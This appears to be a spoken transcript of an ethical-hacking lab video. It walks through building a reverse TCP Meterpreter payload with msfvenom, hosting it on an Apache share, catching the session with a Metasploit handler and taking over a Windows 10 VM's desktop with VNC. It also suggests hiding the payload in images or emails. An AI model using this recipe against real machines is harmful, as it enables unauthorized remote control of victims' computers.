Alright, what's going on, guys? So I got my mic set up, which is good, but I'm still traveling, so you're still going to have um, a little bit of less quality. But this is going to be probably one of the most fun labs you guys have done. This is a lab that's going to show you guys that you can get the payload however you want to the client, but once you get the payload there, how to actually basically control a Windows 10 machine, okay? So first thing we're going to do, this is kind of a lengthier lab, so I want to kind of go through it a little quicker, and you guys can go ahead and, if you need to, pause it or whatever in between these. So the first thing we're going to do is, let's see, it popped up here. Okay, I don't care about face mask. All right. First thing we're going to do is we're going to type in MSF Venom. If you guys have never used this, this basically allows you to create payloads for Metasploit. So we're going to do MSF Venom, and just trust me on these. You guys can look up the actual like syntax and what I'm doing later, but this is simply the payload we're creating. So you're going to type, if I can type, meterpreter. Now, if you guys are interested in MSF Venom, there's a ton of videos out there, a lot more to it than simply this, but what you're doing is you're creating the actual payload, okay? So you're creating it in a different, basically in a way that you can access it without necessarily having to push it to the client, okay? As far with Metasploit anyway. So okay, so you're gonna type it exactly as you're seeing it here. Platform, Windows, then we're gonna do we're gonna do it by 86 because we're doing 86-bit Windows. Yeah, we're gonna do tech F, exe, and then we're gonna set the L host. Okay. Now I've already made this payload, so I'm not going to redo this. But you're gonna set L host. So you do L host equals, and then you do your IP. So we'll for ease of use purposes, we'll say that's our host. But this would be your attacker's host. So what I mean by that is if you're using this machine to attack, this would be the IP that you're using, okay? So we're gonna go ahead and set that, boom, and then we're gonna say L port equals, and you can do whatever port you want. I did 4444 just because it's a random port, right? And then O root desktop test.exe, okay? And all that is saying it's going to write it to that file. Now, that's the command you're going to want to write, okay? That's what's going to, if you guys can see what you're doing here, you're creating the reverse TCP interpreter shell with the platform on the platform Windows 86-bit. You're creating it in a file that's an executable. Here's the host that you're using, the port that you're using, and here's the file's name, okay? So that's kind of the syntax of what you're writing here. Again, you can pause it and look at that. I've already created this. That's that test.exe. Okay, and then what you're going to do is you're going to go ahead. We'll go ahead and clear this out. Like I said, you guys can go ahead and look at it if you want. But then what you're going to do, and I already did this, so I'm not going to walk you through the steps specifically. But what I'm going to do is I'm going to show you guys. You see that, actually I made it in the var, so cd var. Okay, you can see in the var, there's a www right there, that directory, okay? So all I did is I did make dir, mkdir, so make directory. I did var www html share, okay? That's where I made the directory. That's what the directory's got in it. There's nothing else in it. Then I changed the owner or changed the mod for it. So change mod 755, which means that the root can access everything. 55 can read and write. Okay, and then I just did it for that whole share drive. So the same thing, var www html share. Okay, simple, and then I changed owner. So change own r www. And then data. And all this does is basically gives you permissions to do everything you need to do. Data var www html share. Okay, so those are the commands you're going to need to do, and what that's going to do is basically create the directory that you need to have access to when you start your web server, okay? So this will get that directory made, and then what you're going to do, you have to change permissions because most people know that the default permissions will not allow a regular user to access this, okay? So you had to change permissions and then change owner, which is what you just saw me do. And then once you do that, you're just going to copy that. So you're going to copy it. You can move it if you want. I copy because I didn't want to get rid of it so that I could show you guys that I put it on the desktop. So you're going to copy the root desktop, and then you're going to copy the test, okay? And then you're just going to copy it to that same folder. So space var www html share. Okay, that's what you do. You copy it. And just to show you guys, we'll go to cd www, and then what was it? www html. I put the first one there. cd www html share. Is that the dot? Okay, yeah. So you can see there's my test.exe. Okay, so it's in there. Now, all you're gonna do now is you're gonna start your Apache server. So service, mine's already running. Apache 2 and start. Okay, so keep in mind, all we did is we created the share folder for our website, okay? Because basically what we're doing is we're starting a website with Apache 2, and we're saying when you access this, when you download this, right, we're going to give you the payload. Now, keep in mind that this payload is going to pop newer security, okay? So when you go to download it, it's going to say there's a virus in it. Now, this is for an older payload, but this gives you the concepts of if you can get someone to download your program, right? If there's a payload attached to it, this is how you do it. You run it on a web server. If you can send it to them in an email, if you can do, I mean, there's a million ways to get this payload to them, but once you get the payload to them, you'll see how cool it actually is, okay? So, first things we're going to do, now this is, you can see we're going to minimize this. We've got the service running. We'll delete that because I already had the service running. Okay, we'll minimize that. And then you'll see, I'll open this, and we'll just do this. So refresh, there's my IP, okay, there's my share, and then there's my test.exe. So my web server, so we'll get rid of the share, right? So there's your Apache default page, right, for our website. So now we'll do share, and there's our share folder that we created. So now we click test.exe, okay, and we run it. Well, actually, you know what I forgot to do? I forgot to open up meterpreter. So give me 1 sec. So on this box, this is my fault. You need to type in MSF console because you got to be listening for it. That's all it is, and that's my fault. So MSF console takes a second for some computers, which is fine. So you're going to use multi-handler. This lets you basically kind of control. If you ever use Metasploit, you know what the multi-handler is, but it's basically saying I don't want to specify a payload yet. So anyway, so then we'll set payload, and we'll set it as our Windows meterpreter. Now keep in mind we already made this payload, right? Reverse TCP. Okay, press enter. We'll set the host. Now remember what you set your host to before. So 192. Actually, don't remember mine. I have it saved though. Oh, that's not what I wanted. Set L host, and it's, what was it? 192.168.94.128. What did I say? 92.128? 94.128. So there's your L host. If I could type set, not let. Okay, so then you'll set the L port. In my L port, you got to remember it was 4444. Now, you can do whatever port you want. Okay, and then you're just going to do exploit. Now, all this is doing is creating up a listener. So see, it says started reverse TCP handler. It's just listening, okay? So now, when I open this, and I actually open it, okay, it doesn't do anything other than open the meterpreter. So that's actually really interesting. So now we have a meterpreter shell. So we're actually in, okay? People don't necessarily, when they're first starting, don't understand that they're actually in. So look, sysinfo, this is my Windows 10 box. I'm actually in the Windows 10 box. Now here's where it gets a little interesting. When you're on Windows machines, you can do something like this, run VNC. Now if you guys know what VNC is, it's basically a remote accessing tool, but I can force it to run it to give me a remote desktop. So we'll run VNC. Now this is going to start looking real weird because I'm running it all on the same machine, but you'll see here in a sec. We'll just have to wait for it to load up. But you'll see what I mean when I say it starts looking real weird. Okay, so this is our VNC. Okay, so it looks real weird because it looks like I'm on like 5 machines. But what it actually is I actually have a image right now, and I can control the Windows machine through my Kali box. So you can see here at the top, I'm still on my Kali box, but I'm controlling my Windows box, which is kind of throws some people off, and I get it, right? Makes sense. It's a little weird because I'm doing it on a VM. If I had multiple screens, it'd be easier to see, but I don't have multiple screens with me because I'm traveling. But that's all you're going to do. You're basically sending them an executable that you can then hide. You can put it into something else. You can put it into an image. You can put it into an email. You can put it into whatever you want. And when they run that executable, if you're listening on your server, you gain access to their system. Not only do you gain access, but then if you're doing it on a Windows box, which this whole example is, you can use VNC to then get an actual remote GUI interface that's exactly what they see. So you can control that box now. So it's actually a pretty amazing tool. And you can see here, I'll close out of, there you go, I closed out of the interpreter. All right. And that's it, guys. So that one, I would say mess around with a lot. Make the actual exploit, figure out how to embed it into things, figure out how to mess with it. Ask your buddies if you can send it to them and they can open it, and then because it's not a persistent, okay? So what that means is it's not once you close the session, it's closed. There's not a persistent listening device. You didn't create a root shell or anything like that. You didn't create a backdoor. You didn't leave it on the system, okay? Now they need to manually delete you'll have to manually delete this if you don't want to use it anymore, things like that. But for the most part, this is a pretty simple exploit that took 15 minutes to make, and you can see that that's something as simple as, so we'll go ahead and shut off that service Apache 2, stop. Now it took the Apache 2 server is just the way the payload got there, but you can get it there anyway. If I send this to you in an email, and you open it, it does the same thing. It doesn't matter how you open it. It's how do I get it to you and how do I get you to open it, okay? So keep that in mind. Keep thinking of different ways that you could use this, but also think of it as a way to practice creating payloads, understanding the meterpreter shell, because that's huge. Mess around once you get the meterpreter shell, see what you can do with it. Meterpreter has its own commands, so there's other things you can do besides simply changing directories and things like that. So that's it, guys. This was in my opinion, is one of the most fun because it's one of the first times you're actually going to physically take over a machine, and it's one of the ones that you can do from like across your house. If you have 2 computers, you could have one open it up and then one sit back and take control of the machine, stuff like that. So it's pretty neat. Let me know what you guys think. Make sure you guys like and tell me if this is the type of stuff you guys want me to focus on when I'm finished with the CEH labs, because I am going to keep doing them all. But this is the type of stuff that I feel like most people are interested in, but you have to understand the other stuff to really understand this stuff. So let me know what you guys think, and once again, appreciate you watching.